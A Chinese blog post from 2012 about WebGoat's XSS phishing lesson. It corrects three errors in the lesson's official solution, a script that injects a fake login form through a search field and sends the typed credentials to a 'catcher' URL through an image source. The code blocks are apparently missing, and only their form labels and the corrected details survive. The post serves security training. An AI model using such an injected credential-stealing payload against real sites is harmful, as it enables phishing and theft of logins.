Chinaunix首页 | 论坛 | 博客
  • 博客访问: 163246
  • 博文数量: 36
  • 博客积分: 2225
  • 博客等级: 大尉
  • 技术积分: 385
  • 用 户 组: 普通用户
  • 注册时间: 2009-09-22 21:06
文章分类
文章存档

2012年(5)

2011年(5)

2010年(17)

2009年(9)

我的朋友

分类: 网络与安全

2012-07-25 14:49:36

点击Solution,solution中给出如下代码,但是其中存在多个错误再次给大家指出来(错误见红色表示):




This feature requires account login:



Enter Username:

Enter Password:






webgoat中solution给出以上代码中共有三个错误:1 缺少一个,因为在search的input的中输入以上代码后,search的form表单中的结尾符将上述代码伪造的form表单包含进去,因此form标签会出现混乱,因此在脚本的最前面加上,表单所在网页共3个表单,我们添加的表单是第三个因此应该是forms[2]而非forms[0],再有就是XSSImage.src="http://localhostcatcher?"应为:XSSImage.src="http://localhost/catcher?"


我自己的代码贴出来:



This feature requires account login:



Enter Username:

Enter Password:





阅读(2606) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~
评论热议
请登录后评论。

登录 注册